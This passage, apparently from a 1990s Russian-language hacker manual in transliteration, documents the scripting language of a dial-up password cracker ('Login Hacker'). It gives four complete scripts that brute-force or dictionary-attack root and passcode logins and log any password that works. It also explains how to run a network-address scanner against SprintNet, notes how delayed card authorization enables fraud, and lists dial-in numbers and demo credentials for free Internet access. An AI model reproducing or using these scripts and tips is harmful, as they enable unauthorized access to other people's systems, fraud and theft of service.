WAIT4STRING(NUMBER,STRING,NUMBER,
COMMAND,STRING)
V predstavlennom zdes' yazyke skriptov eto samaya vazhnaya komanda. Posle
ee vypolneniya vyhodnoj signal modema budet nahodit'sya v sostoyanii ozhidaniya.
V etot moment dolzhna nachat'sya zagruzka special'nogo slova. Esli stykovka
osushchestvlena, to skript prodolzhaetsya, esli -- net, to posle tajmauta v modem
budet otpravlena zadannaya posledovatel'nost', zatem -- vnov' tajmaut i,
nakonec, idet vypolnenie komandy.
Vazhno: Snachala komanda WAIT4STRING proveryaet tekushchuyu stroku s
predstavlennym slovom. Sintaksis: WAIT4STRING(a,b,c,d,e).
a
Opredelit' tajmaut v diapazone ot 0 do 255 sekund. Nol' sootvetstvuet
neogranichennomu ozhidaniyu, to est' zhdat' do teh por poka ne nastupit tak
nazyvaemyj TOTAL TIMEOUT (skript perehodit v sekciyu #NOCARRIER v tom sluchae,
esli dannye ne postupayut iz modema v techenie pyati minut). Esli nichego ne
polucheno, to posledovatel'nost' v potoke dannyh raspoznaetsya snova, ili v
kakoj-to moment nesushchaya chastota ob®yavlyaetsya poteryannoj.
b
Posledovatel'nost' dannyh, kotoraya budet poslana v modem posle
tajmauta.
c
CHastota otkazov ili kolichestvo obshchego vremeni, v techenie kotorogo mozhet
vypolnyat'sya fatal'naya komanda. Diapazon: ot 0 do 255 (0=nikogda, 1=pervyj
raz).
d
Vypolnenie special'noj fatal'noj komandy. |to mogut byt' lyubye komandy,
isklyuchaya: ALARM, WAIT4STRING i IF.
e
Posledovatel'nost' dannyh dlya ozhidaniya. Dannye chuvstvitel'ny k
registru.
Naprimer: WAIT4STRING(15,^M,2,GOTO(1),ogin:)
V etom primere proishodit ozhidanie posledovatel'nosti ogin: v techenie
15 sekund. Esli stykovka ne poluchilas', a karetka vozvrashchaetsya v modem (^M),
to komanda snova zhdet 15 sekund, poka vnov' ne naladitsya stykovka s
posledovatel'nost'yu dannyh ogin:.
Kak tol'ko istekut sleduyushchie 15 sekund, vyzyvaetsya fatal'naya komanda,
chto oznachaet perehod k GOTO s metkoj pod nomerom 1.
LOG_SESSION_ON
Nachinaya s etogo punkta, vse dannye postupayushchie iz modema zapisyvayutsya v
fajl registracii.
Naprimer: LOG_SESSION_ON
LOG_SESSION_OFF
Esli soderzhimoe ekrana zapisano v fajl registracii, to k etomu punktu
bol'she ne budet obrashchenij.
Naprimer: LOG_SESSION_OFF
SEND(STRING)
Komanda SEND peredaet posledovatel'nost' dannyh v modem. CHerez etu
komandu vy mozhete peresylat' v modem peremennye so znakom $. V konec
posledovatel'nosti peredaetsya vozvrat karetki. Esli posledovatel'nost'
dannyh ne zadana, to srazu osushchestvlyaetsya perehod na vozvrat karetki.
Naprimer:
SEND(echo Hacked you system Time: $TIME - Date:
$DATE > HACKED.TXT)
V dannom primere komanda SEND posylaet v modem sleduyushchuyu stroku:
echo HAcked your system Time: 23:00 - Date: 24-12-95 > HACKED.TXT
SEND_()
|ta komanda analogichna vysheopisannoj, no ona ne posylaet v modem simvol
vozvrata karetki ^M. Ee mozhno ispol'zovat', esli vam nuzhno zagruzit' v modem
tol'ko odin simvol ili komandnyj rezhim +++.
Primery:
SEND_(n)
SEND_(+++)
SEND_NEXT_DIC(NUMBER)
Naprimer: SEND_NEXT_DIC(1)
SEND_DIC(NUMBER)
Pereslat' tekushchij slovar' v modem.
Naprimer: SEND_DIC(1)
NEXT_DIC(NUMBER)
Peremestit'sya na slovo, sootvetstvuyushchee argumentu NUMBER.
Naprimer: NEXT_DIC(1)
SEND_NEXT_BRUTE(NUMBER)
Ispol'zuya Brute Force Generator, sgenerirovat' sleduyushchuyu dopustimuyu
posledovatel'nost' i pereslat' ee v modem.
Naprimer: SEND_NEXT_BRUTE(1)
SEND_BRUTE(NUMBER)
Pereslat' v modem tekushchuyu posledovatel'nost' dopustimyh dannyh iz
slovarya Brute Force Generator.
Naprimer: SEND_BRUTE(1)
NEXT_BRUTE(NUMBER)
Sgenerirovat' sleduyushchuyu dopustimuyu posledovatel'nost' dannyh iz slovarya
Brute Force Generator.
Naprimer: NEXT_BRUTE(1)
IF VARIABLE OPERATOR STRING THEN COMMAND
Komanda IF pervoj versii etoj programmy ne ochen' gibkaya. Sintaksis etoj
komandy sleduyushchij:
IF THEN
Oznachaet ravnosil'nost' pri argumente =, bol'she ili men'she pri
argumentah < ili > sootvetstvenno i peremennuyu soderzhashchuyu lyubuyu
posledovatel'nost' slov pri argumente ~. Peremennye i posledovatel'nosti
dolzhny byt' diskretnymi peremennymi.
|ta komanda vypolnitsya v tom sluchae, esli budet soblyudeno uslovie TRUE.
CHtoby ee ispol'zovat', prosmotrite spisok komand dlya operatora WAIT4STRING.
Naprimer:
IF STRING~ogin THEN GOTO(3)
To est', esli tekushchaya stroka (STRING) soderzhit diskretnuyu (~)
posledovatel'nost' dannyh ogin, to idti (GOTO) k markeru s nomerom 3.
EXECUTE(STRING)
Vypolnit' DOS-programmu, a zatem zapustit' skript. Vy dolzhny vklyuchit'
peremennye v vypolnyaemu stroku. Vy takzhe dolzhny vypolnit' sootvetstvuyushchie
vnutrennie komandy MS DOS. Pomnite, chto pered peremennoj mozhet stoyat' znak $
s vozmozhnymi probelami pozadi i vperedi samogo znaka.
Vazhno: Esli vy hotite zapustit' programmu v to vremya, kogda po vashemu
skriptu osushchestvleno soedinenie, to vy dolzhny ispol'zovat' drajver fossil. V
protivnom sluchae vash komp'yuter zavisnet. Poetomu zapustite X00.EXE E 2 pered
vypolneniem programmy Login Hacker.
Vazhno: CHtoby vasha programma ne byla povrezhdena, predvaritel'no
sohranite ee v kataloge otlichnom ot ishodnogo.
Primery:
EXECUTE(C:\SB\VPLAY C:\SB\VOC\HACKED.VOC)
EXECUTE(COPY $LOGFILE C:\HACKED)
ALARM(STRING,COMMAND)
Opasno! Nazhimat' na spuskovoj kryuchok! Esli na udalennom komp'yutere
srabotala sistema zashchity, to vy budete aktivny do teh por, poka ne
vypolnitsya eta komanda.
STRING
Posledovatel'nost', dlya kotoroj osushchestvlyaetsya poisk dannyh s ih
posleduyushchej peredachej v modem.
COMMAND
|ta komanda budet vypolnena posle stykovki. CHtoby ee ispol'zovat',
prosmotrite listing komand dlya WAIT4STRING. Primenite etu komandu v tom
sluchae, naprimer, esli vy vzlomali BBS, a sisop vas raskusil i zadaet glupye
voprosy. Posle etoj komandy vy avtomaticheski prervete soedinenie i
ostanovite vypolnenie skripta.
Naprimer:
ALARM(chat,GOTO(#END))
SET VARIABLE=STRING
|toj komandoj vy opredelyaete peremennuyu v sekcii #START ili #NOCARRIER.
Esli peremennaya yavlyaetsya staticheskoj peremennoj, to vy dolzhny eto otmetit'.
Vy dolzhny ustanavlivat' tol'ko sleduyushchie peremennye: STRING, DIAL_TRIED,
LOGIN_TRIED, S_TMP i D_TMP.
Naprimer:
SET D_TMP=3
Opredelit' staticheskuyu peremennuyu D_TMP v kachestve 3.
INC(DIGIT_VARIABLE)
Uvelichit' chislo ukazannoj peremennoj na 1. |ta komanda budet vypolnena
lish' v tom sluchae, esli peremennaya posle dopolneniya ne nahoditsya v ukazannom
diapazone.
Imeyut silu sleduyushchie komandy: DIAL_TRIES, DIAL_TRIED, LOGIN_TRIES,
LOGIN_TRIED i D_TMP.
Naprimer: INC(D_TMP)
DEC(DIGIT_VARIABLE)
Umen'shit' chilo ukazannoj peremennoj na 1. |ta komanda budet vypolnena
lish' v tom sluchae, esli peremennaya posle vychitaniya ne budet nahodit'sya vne
ukazannogo diapazona.
Imeyut silu sleduyushchie komandy: DIAL_TRIES, DIAL_TRIED, LOGIN_TRIES,
LOGIN_TRIED i D_TMP.
Naprimer:
DEC(D_TMP)
WAIT(NUMBER)
Ozhidat' do teh por, poka idut sekundy, opredelennye argumentom NUMBER.
Argument NUMBER sootvetstvuet lyubomu chislu v diapazone ot 1 do 65535.
Naprimer: WAIT(10) (desyat' sekund)
WAIT_(NUMBER)
Ozhidat' do teh por, poka idut millisekundy, opredelennye argumentom
NUMBER. Argument NUMBER sootvetstvuet lyubomu chislu v diapazone ot 1 do
65535.
Naprimer: WAIT(500) (polsekundy)
BEEP
Sozdaet signal, pohozhij na legkij zvuk bibikalki!
Peremennye i upravlyayushchie simvoly
Rech' idet o peremennyh, kotorye mogut byt' ispol'zovany v komandah
SEND() ili LOG(). Kak uzhe otmechalos', zakachka peremennyh v modem ili fajl
registracii opredelyaetsya simvolom $ (dollara), postavlennym pered
sootvetstvuyushchej peremennoj, i probelami. Vy mozhete ispol'zovat' #DEFINE
lyubye specificheskie peremennye. Vam ih nuzhno tol'ko opredelit'.
STRING
Simvoly peresylayutsya iz modema v poslednyuyu stroku.
STRING2
Poslednie 250 simvolov otpravlyayutsya iz modema.
DIAL_TRIED
Fakticheskie popytki nabora nomera.
LOGIN_TRIED
Fakticheskie popytki poluchit' imya i parol'.
TIME
Dejstvitel'noe vremya v chasah i minutah (dvoetochie propuskaetsya).
Naprimer, TIME=1505 oznachaet 15:05.
DATE
Tekushchaya data v formate MMDD. Naprimer, DATE=503 oznachaet 3 maya.
DIC(1)
Tekushchij zagruzhennyj slovar' 1.
BRUTE(2)
Tekushchaya stroka slovarya Brute Force Generator 2.
S_TMP
Peremennaya stroka. Vy mozhete ee ispol'zovat', kak vam nravitsya.
D_TMP
Peremennaya dlya cifr. Vy mozhete ee ispol'zovat', kak vam nravitsya.
V komandah IF i SET vy mozhete ispol'zovat' isklyuchitel'no vysheopisannye
peremennye. Peremennye iz #DEFINE isklyuchayutsya. Tol'ko staticheskie peremennye
i konstanty priemlemy dlya IF! Ne nuzhno takzhe ispol'zovat' znak $ pered
peremennoj. |tot znak dopustim tol'ko v komandah SEND, LOG i WAIT4STRING.
Naprimer:
IF TIME>1215 THEN GOTO #END
(otsoedinit'sya posle 12:15).
LOG($DIC(3))
SEND($S_TMP)
Teper' otnositel'no specsimvolov. Vy mozhete zapisyvat' lyubye
upravlyayushchie simvoly vmeste s komandami LOG, SEND ili WAIT4STRING cherez znak
^ (shapochka). |to oznachaet, chto vy mozhete vvesti, naprimer, ^M ili napisat'
^^ ... okej?, ili ispol'zovat' lyubye konstrukcii ot ^A do ^Z plyus ^[ ^\ ^] i
^^.
Naprimer:
SEND_(^D)
#DEFINE
#NOCARRIER
#START
#END
Soobshcheniya ob oshibkah
Esli v processe kompilyacii vy poluchaete soobshchenie ob oshibke, to
pomnite, chto v vashem rasporyazhenii imeetsya fajl .BAK. Prosmotrite i
vnimatel'no izuchite soderzhimoe etogo fajla.
Pri kompilirovanii skripta mozhet vsplyt' tol'ko dva soobshcheniya ob
oshibke:
WARNING
Vy chto-to ne tak skompilirovali. Kompilyator v lyubom sluchae sozdast
skript, kotoryj mozhet zapustit'sya bez vsyakih problem. |to soobshchenie,
naprimer, mozhet byt' vydano, esli nevozmozhno najti ukazannyj slovar'.
Vozmozhno, chto vy ne polnost'yu podgotovili kopiyu.
ERROR
|to kriticheskaya oshibka. V kakoj-to moment kompilyator prerval
neobhodimuyu proceduru zaversheniya. Dlya ispravleniya etoj oshibki prover'te fajl
s rasshireniem .BAK i vash ishodnyj fajl.
Primer standartnogo skripta
#DEFINE
PHONE_NR=,
LOGFILE=lh&scave.log
DIC(1)=d:\project\hack\word\badpws.dic
; zadajte korrektnyj put' k vashemu slovaryu
#NOCARRIER
IF S_TMP=DEFINE THEN EXECUTE(scavenge.exe /nooutput /s hangup.scr)
LOG(Carrier lost on $DATE at $TIME)
LOG()
GOTO(#START)
#START
SET S_TMP=UNDEFINE
;SET S_TMP=DEFINE
HANGUP
LOG_SESSION_ON
SET STRING2=
IF S_TMP=DEFINE THEN EXECUTE(scavenge.exe /nooutput /s pickup.scr)
IF S_TMP=UNDEFINE THEN SEND(AT H1)
EXECUTE(scavenge.exe /nooutput /s thc&scav.scr)
:111
SEND(ATD)
SET D_TMP=0
:112
WAIT(1)
INC(D_TMP)
IF D_TMP>50 THEN GOTO(99)
CHECK4CARRIER(112)
SEND()
; poslat' vozvrat karetki posle soedineniya
:1
WAIT(1)
IF STRING2~assw THEN GOTO(2)
GOTO(1)
:2
SEND_NEXT_DIC(1)
WAIT(2)
IF STRING2~ncorr THEN GOTO(3)
GOTO(50)
:3
SET STRING2=
:4
WAIT(1)
IF STRING2~assw THEN GOTO(5)
GOTO(4)
:5
SEND_NEXT_DIC(1)
WAIT(2)
IF STRING2~ncorr THEN GOTO(6)
GOTO(50)
:6
SET STRING2=
:7
WAIT(1)
IF STRING2~assw THEN GOTO(8)
GOTO(7)
:8
SEND_NEXT_DIC(1)
WAIT4STRING(10,,1,GOTO(50),ncorr)
GOTO(99)
:50
BEEP
BEEP
BEEP
LOG(------------- -----------------)---- -------------------)
LOG($DATE $TIME)
LOG()
LOG(PASSWORD: $DIC(1))
LOG()
GOTO(150)
:99
CHECK4CARRIER(OFF)
IF S_TMP=UNDEFINE THEN GOTO(#START)
EXECUTE(scavenge.exe /s rebreak.scr)
; sozdanie skripta dlya perenabora nomera i dozvona do celi
GOTO(111)
:150
IF S_TMP=DEFINE THEN EXECUTE(scavenge.exe /nooutput /s hangup.scr)
GOTO(#END)
#END
Pervyj primer skripta
Sistemnyj deskriptor: UNIX na F.
No vy nikogda ne dolzhny eto delat'.
#DEFINE
LOGFILE=C:\OUTPUT\NY-SYS5.LOG
PHONE_NR=I dont tell you ;)
DIAL_TRIES=3
LOGIN_TRIES=0
DIC(1)=C:\HACKING\DICTIONA.RY\BAD_PWS.DIC
#NOCARRIER
BEEP
BEEP
BEEP
LOG(NO CARRIER)
LOG(ON $DATE $TIME)
LOG(AT $DIC(1))
LOG()
GOTO(#START)
#START
LOG(------------------------- -----)---- -------------------)
LOG(TARGET : $PHONE_NR ON $DATE - $TIME)
LOG()
:1
LOG(Dialing ...)
DIAL
LOG($STRING)
LOG_SESSION_ON
SEND()
SEND()
WAIT4STRING(15,^M,4,GOTO(1),name)
SEND( )
LOG_SESSION_OFF
:2
SEND(CONNECT HACK.THIS.SYSTEM.EDU)
:3
WAIT4STRING(30,^C,1,GOTO(2),ogin:)
SEND(root)
WAIT4STRING(20,^D,1,GOTO(2),assword:)
SEND_NEXT_DIC(1)
IF STRING~ogin: THEN GOTO(3)
IF STRING~refused THEN GOTO(2)
LOG()
LOG($STRING)
LOG()
LOG(!!!!! WE GOT THROUGH !!!!!!)
LOG(Login : root)
LOG(Password : $DIC(1))
LOG()
BEEP
BEEP
BEEP
BEEP
BEEP
HANGUP
GOTO(#END)
#END
Vtoroj primer skripta
#DEFINE
INIT_MODEM=AT&N15
INIT_DATA=7E1
LOGFILE=C:\OUTPUT\TELEKOM4.LOG
PHONE_NR=I dont tell you ;)
DIAL_TRIES=3
LOGIN_TRIES=0
BRUTE(1)=1,1,1,12
#NOCARRIER
BEEP
BEEP
BEEP
LOG(NO CARRIER)
LOG(ON $DATE $TIME)
LOG(AT $BRUTE(1))
LOG()
GOTO(#START)
#START
LOG(-----------------------------------)---- ---------------)
LOG(TARGET : $PHONE_NR ON $DATE - $TIME)
LOG()
:1
LOG(Dialing ...)
HANGUP
DIAL
LOG($STRING)
WAIT4STRING(15,^M,4,GOTO(1),PA)
:2
SEND_NEXT_BRUTE(1)
WAIT4STRING(3,^M,2,GOTO(3),PA)
GOTO(2)
:3
LOG_SESSION_ON
SEND()
SEND(?)
SEND(HELP)
SEND(HILFE)
LOG()
LOG(!!!!! WE GOT THROUGH !!!!!!)
LOG(Password : $BRUTE(1))
LOG()
BEEP
BEEP
BEEP
BEEP
BEEP
HANGUP
GOTO(#END)
#END
Tretij primer skripta
|tot skript mozhet byt' ispol'zovan na nekotoryh nebesplatnyh telefonnyh
liniyah 0130-xxxxxx.
; Sistema trebuet parol'
; Neogranichennoe kolichestvo popytok pozvolyaet vojti v sistemu
;
; 30xCrLf
; PASSCODE:*****
;
#DEFINE
INIT_MODEM=AT &F L2
INIT_DATA=8N1
LOGFILE=xxxxxx.LOG
PHONE_NR=0130xxxxxx
DIAL_TRIES=5
LOGIN_TRIES=0
DIC(1)=C:\2\thc-lh09\w1.w
#NOCARRIER
BEEP
BEEP
BEEP
LOG(NO CARRIER)
LOG(ON $DATE $TIME)
LOG(AT $DIC(1))
LOG()
GOTO(#START)
#START
LOG(------------------- ---------)---- -------------)
LOG(TARGET : $PHONE_NR ON $DATE - $TIME)
LOG()
:1
LOG(Dialing ...)
HANGUP
DIAL
LOG($STRING)
WAIT4STRING(30,.^M,3,GOTO(1),PASS)
:2
set string=
SEND_NEXT_DIC(1)
wait(1)
LOG($DIC(1))
; da, registrirovat'sya s kazhdoj popytki!
WAIT4STRING(15,.^M,3,GOTO(3),PASS)
GOTO(2)
:3
LOG_SESSION_ON
SEND()
SEND(?)
SEND(HELP)
SEND()
LOG()
LOG(!!!!! WE GOT THROUGH !!!!!!)
LOG(Password : $DIC(1))
LOG()
BEEP
BEEP
BEEP
BEEP
BEEP
HANGUP
GOTO(#END)
#END
CHetvertyj primer skripta
|to skript prednaznachen isklyuchitel'no dlya platform Telnet.
#DEFINE
init_modem=z
init_data=8n1
LOGFILE=xxxxxx.log
PHONE_NR=xxxxxx
DIAL_TRIES=0
LOGIN_TRIES=0
DIC(1)=D:\hackusr\dictbig.txt
;dic(2)=d:\hackusr\bigdict2.txt
;dic(3)=d:\hackusr\bigdict3.txt
#NOCARRIER
LOG(NO CARRIER)
LOG(ON $DATE $TIME)
LOG(AT $DIC(1))
LOG(returning ...)
GOTO(#START)
#START
HANGUP
LOG_SESSION_ON
LOG()
log()
log( HaCK ATTeMPT STaRTeD ......)
log()
log( TaRGeT: $PHONE_NR )
log( DaTe: $DATE )
log( TiMe: $TIME)
log()
log()
log( ......DiaLiNG)
dial
log()
log( ......CoNNeCTeD!)
log()
log()
wait(5)
:1
wait4string(1,^M,5,goto(#start),sername>)
send(fh65)
:2
wait4string(1,^M,5,goto(#start),ocal>)
send(connect 189.25.56.7)
:3
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait4string(1,^C,5,goto(4),ogin:)
send(root)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
:4
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait4string(1,^D,5,goto(4),assword:)
send_next_dic(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
:5
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
:6
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
wait(1)
if string~sconnected then goto(2)
if string~ncorrect then goto(3)
:7
beep
beep
beep
beep
beep
beep
beep
beep
beep
log()
log()
log()
Log(...... HaCK ATTeMPT WaS SuCCeSSFuLL!!!!!!!!!!!!!!)
log()
log( TaRGeT: $PHONE_NR DaTe: $DATE TiMe: $TIME)
log()
log()
log()
log( ACCouNT: root)
log( PaSSWoRD: DIC(1))
log()
log()
log()
#END
Skanirovanie adresov pol'zovatelej
Operacii po skanirovaniyu setevyh adresov my razberem na osnove ves'ma
izvestnoj programmy Network User Address Attacker. |ta programma izvestnogo
soobshchestva P/H/A. NUA Attacker napisan na Turbo C 2.0 hakerom Doktorom
Dissektorom. Network User Address Attacker skaniruet klavishnuyu panel'
SprintNet. Pri etom programma sposobna raspoznat' oshibki kodov na SprintNet
i drugih tipah soedinenij. Kazhdyj otskanirovannyj setevoj adres mozhet
zaregistrirovat'sya pod logfile s opisaniem vozvrashchennogo koda oshibki ili
kratkoj summoj dannyh glavnoj sistemy. Takim obrazom, programma
dozvanivaetsya do Net i skaniruet setevye adresa pol'zovatelej. Diapazon
skanirovaniya zadaetsya atakuyushchim. Krome etogo, v prilagaemom k programme
fajle SND390.TXT imeetsya spisok nekotoryh modemnyh telefonnyh nomerov. Vy
mozhete, konechno, ispol'zovat' tol'ko izvestnyj vam nomer, to est' tot nomer,
kotoryj naibolee blizko sootvetstvuet vashemu regionu.
|ta programma mozhet byt' naibolee poleznoj pri poiske setej s
kommutiruyushchimi paketami ili na osnove UNIX. Avtor etoj programmy nadeetsya,
chto lyubye oshibki, najdennye v nej, budut peredany cherez soobshchestvo P/H/A
hakeram Doktoru Dissektoru, Temnomu SHlemu, Korejcu Podavitelyu ili Anonimnomu
Anarhistu.
Fajly programmy
NUAA.EXE
Programma NUA Attacker.
NUAA.DOC
Dokumentaciya
README.PHA
Prochtite eto snachala!
SND390.TXT
Spisok telefonnyh nomerov Net.
NUAA.CFG
Otchet o tekushchej atake i konfiguracii modema.
NUAFILE.PHA
Spisok setevyh adresov pol'zovatelej.
LOGFILE.PHA
Spisok setevyh adresov pol'zovatelej, sostavlennyh atakuyushchim. V etom
fajle takzhe soderzhatsya kody otveta NUA, poluchennye atakuyushchim.
Fajly NUAfile i Logfile mogut modificirovat'sya. Fajly NUAFILE.PHA i
LOGFILE.PHA -- eto obyknovennye tekstovye fajly, vy mozhete redaktirovat' ih
v lyubom tekstovom redaktore. Krome togo, esli fajl uzhe sushchestvuet, to lyubye
dannye dobavyatsya k tomu imeni fajla, kotorye sushchestvuyut v fajle s metkoj
EOF.
Zapusk programmy
Dlya zapuska NUA Attacker vvedite s vashej konsoli sleduyushchee:
C:\ >NUAA [/I]
Parametr /I pozvolyaet vam nachat' vypolnenie programmy bez inicializacii
modema pered skanirovaniem adresov. V etom sluchae, kogda vy vyberite komandu
Begin attack (Nachat' napadenie), NUA Attacker srazu nachnet skanirovanie
adresov (esli vy predvaritel'no zaregistrirovalis' v sisteme, to teper' vy
snova dolzhny zaregistrirovat'sya na Net cherez priglashenie @).
Nastrojka rezhima skanirovaniya
Nastrojka skanirovaniya adresov osushchestvlyaetsya cherez komandu Setup
attack. V poyavivshemsya dialogovom okne vypolnite nastrojku sleduyushchih opcij.
Phone Number
Telefonnyj nomer Net (SND390.TXT).
Starting NUA
Nachal'nyj setevoj adres pol'zovatelya.
Ending NUA
Konechnyj setevoj adres pol'zovatelya.
Timeout
Vremya ozhidaniya otveta ot setevogo adresa pol'zovatelya.
Log filename
Imya fajla, v kotoryj budut vyvoditsya soobshcheniya ob oshibkah i informaciya
o neudachnyh popytkah soedineniya.
NUA filename
Imya fajla, v kotoryj budut vyvoditsya setevye adresa pol'zovatelej (po
umolchaniyu eto fajl NUAFILE.PHA).
Decimals
Vklyuchit' ili otklyuchit' rezhim desyatichnogo skanirovaniya.
Pol'zovateli Net ispol'zuyut setevye adresa v formate XXXXXX.XX. NUA
Attacker podderzhivaet skanirovanie desyatichnyh chisel.
Naprimer, esli vy nastroite etu opciyu tak:
Starting NUA: 619100.10
Ending NUA: 619200.10
to programma nachnet skanirovanie s 619100.10, sleduyushchij adres
skanirovaniya sootvetstvuet 619100.11, zatem pojdet 619100.12 i tak dalee.
Pri nastrojke skanirovaniya vy mozhete vospol'zovat'sya sleduyushchimi
goryachimi klavishami:
ESC
Vyjti iz dialogovogo okna Setup attack bez sohraneniya modificirovannyh
parametrov.
LT-S
Sohranit' modificirovannye parametry v pamyat' komp'yutera.
Posle togo, kak vy vypolnite nastrojku skanirovaniya, vy mozhete takzhe
sohranit' ee na disk vybrav iz menyu File komandu Save options. Pri etom
sohranyatsya i vse modificirovannye parametry nastroek modema.
Neskol'ko slov po povodu formata setevogo adresa
Dopustim, chto vy proizveli nastrojku tak:
Starting NUA: 6191 *WRONG*
Ending NUA: 619100 *RIGHT*
|to oznachaet, chto skanirovanie prohodit v diapazone s 6191 po 6199 s
propuskom 6200. Poetomu vy dolzhny nastroit' parametry skanirovaniya tak:
Starting NUA: 619001 *RIGHT*
Ending NUA: 619100 *RIGHT*
To est', oba chislovyh polya dolzhny imet' odinakovuyu dlinu.
Nastrojka modema
Nastrojka modema osushchestvlyaetsya cherez dialogovoe okno Modem parameters.
COM Port
Port, kotoryj ispol'zuet vash modem.
Baud Rate
Skorost' peredachi dannyh v bodah
(naprimer, 9600).
Initialization
Inicializaciya terminal'noj stroki pered nachalom skanirovaniya. |ta opciya
takzhe podderzhivaet Hayes-sovmestimye modemy.
Dial Prefix
Prefiks pered telefonnym nomerom.
Dial Suffix
Simvol, kotoryj budet stoyat' posle telefonnogo nomera. |tot simvol
proshivaet vash modem sootvetstvuyushchim parametrom.
Hangup
Prervat' posledovatel'nost' peredavaemyh dannyh.
Process skanirovaniya
Vyberite opciyu Begin attack. Posle etogo proizojdet sleduyushchee:
1. Inicializaciya modema.
2. Nabor nomera Net. |tot nomer sootvetstvuet nastrojkam, proizvedennym
v dialogovom okne Setup attack.
3. Ozhidanie priglasheniya TERMINAL= i zagruzka parametra D1. Parametr D1
oznachaet, chto vash komp'yuter voshel v set'.
4. Ozhidanie priglasheniya @.
5. Skanirovanie. Skanirovanie sootvetstvuet parametru Starting NUA
dialogovogo okna Setup attack.
Posle togo, kak skanirovanie setevyh adresov zakonchitsya, NUA Attacker
vyjdet iz seti.
V processe skanirovaniya vy mozhete vospol'zovat'sya sleduyushchimi goryachimi
klavishami:
ALT-B
Peredat' v Net signal, sootvetstvuyushchij preryvaniyu soedineniya.
ALT-H
Povesit' trubku. V etom sluchae programma nachnet rabotat' v rezhime
Pause.
ALT-X
Povesit' trubku, vyjti i prekratit' ataku.
ESC
Vremenno ostanovit' process skanirovaniya.
V processe napadeniya na ekrane vashego monitora budut poyavlyat'sya
sleduyushchie soobshcheniya:
Starting NUA
Setevoj adres, kotoryj programma nachinaet skanirovat'.
Ending NUA
Otskanirovannyj setevoj adres.
Connections
Kolichestvo soedinenij, najdennoe v tekushchem skanirovanii.
Current NUA
Setevoj adres, kotoryj programma otskanirovala v dannyj moment vremeni.
Log
Logfile.
NUA
NUAfile.
Time/Elapsed
Tekushchee vremya i vremya skanirovaniya.
Status
Kod soedineniya i/ili sootvetstvuyushchaya informaciya o sostoyanii modema.
Last
Kod poslednego soedineniya i/ili sootvetstvuyushchaya informaciya o sostoyanii
modema.
V dialogovom okne Setup attack obratite vnimanie na pereklyuchatel' v Bad
Pad. Esli vybrana opciya Y, eto oznachaet, chto programma posylaet v set'
stroku 10 i kazhdyj raz zhdet dve sekundy do teh por, poka ne
poyavitsya priglashenie @ ili TERMINAL=. (to est', do neposredstvennoj
registracii na Net). Nekotorye klaviatury medlenno reagiruyut na registraciyu
v seti. Osobenno eto otnositsya k vysokim skorostyam. Poetomu, esli vy ne
mozhete zaregistrirovat'sya, aktivizirujte parametr Y.
Kreditnye kartochki i Internet
Peresylaya nomer kreditnoj kartochki cherez Internet, on popadaet k
prodavcu, kotoryj proizvodit tak nazyvaemuyu avtorizaciyu (proishodit svyaz' s
organizaciej, otvetstvennoj za obrabotku tranzakcij). V sluchae
polozhitel'nogo otveta na zapros, neobhodimaya summa deneg rezerviruetsya,
zakazannyj tovar otpravlyaetsya pokupatelyu, zatem den'gi snimayutsya so
special'nogo bankovskogo scheta i perechislyayutsya na schet prodavca.
Ponyatno, chto esli avtorizaciya ne budet osushchestvlena nemedlenno, to
pokupatel' mozhet obmanut' prodavca putem neskol'kih zakazov podryad u
storonnih prodavcov.
Problema nemedlennoj avtorizacii v Internet poka eshche polnost'yu ne
reshena (mnogie firmy ispol'zuyut obyknovennyj modem dlya svyazi s processorom,
kazhdyj iz kotoryh, imeet, kak pravilo, raznyj format soobshchenij).
V nastoyashchee vremya kreditnye kartochki i Internet tesno svyazany s firmoj
CyberCash (http://www.cybercash.com). CyberCash cherez Public Key
Cryptography shifruet vsyu konfidencial'nuyu informaciyu, kasayushchuyusya kreditnoj
kartochki, svyaz' s processorami osushchestvlyaetsya s pomoshch'yu tak nazyvaemogo
central'nogo interfejsa CyberCash Gateway, pokupatel' installiruet na svoj
komp'yuter programmu CyberCash Wallet, kotoraya v zashifrovannom vide hranit
nomer kreditnoj kartochki, prodavec osushchestvlyaet svoyu deyatel'nost'
posredstvom platezhnogo servera i standartnyh skriptov CGI.
CompuServe i besplatnyj Internet
CHerez CompuServ mozhno poluchit' dostup k Internet. Dlya etogo neobhodimo
installirovat' Compuserve, zapustit' Membership Sign-Up, v razdele Strana ne
ukazyvat' Rossiyu, poluchit' vremennyj parol' i login i dozvonit'sya k Infonet
po odnomu iz sleduyushchih moskovskih telefonov: 9150001, 9150005, 9715101,
9150033.
PlusCentro i besplatnyj Internet
Na serevere PlusCentro cherez http://www.plus.centro.ru sushchestvuet
gostevoj vhod. Na samom dele eto vpolne funkcional'nyj dostup k Internet.
Neobhodimo tol'ko dozvonit'sya po odnomu iz sleduyushchih moskovskih telefonov:
4901595, 4909419, 4909363, 4909371, 4909491.
Podrobnosti mozhno uznat' po etomu golosovomu telefonu: 4909424.
Demos i besplatnyj Internet
Kompaniya Demos pozvolyaet ispol'zovat' demonstracionnyj vhod v Internet.
Dlya etogo neobhodimo dozvonit'sya po odnomu iz sleduyushchih moskovskih
telefonov: 9613200, 2410505, 9566285, 9566286. V pole Login nuzhno vpisat'
_demo, a v pole Password nabivaetsya parol' v vide demo.
Zashchita sistemy? Vsegda!
Tak nazyvaemyj klass zashchishchennosti A byl opredelen v svoe vremya
Ministerstvom oborony SSHA v znamenitoj "Orange book". Sejchas mnogie seti
baziruyutsya na neodnorodnyh programmno-apparatnyh sistemah i ispol'zuyut
slishkom raznye setevye servisy. Tak voznikayut vpolne opredelennye dyry
prakticheski na vseh urovnyah raboty seti, vklyuchaya verifikaciyu pol'zovatelej.
Samaya prostaya zashchita seti mozhet osushchestvlyat'sya na urovne samoj
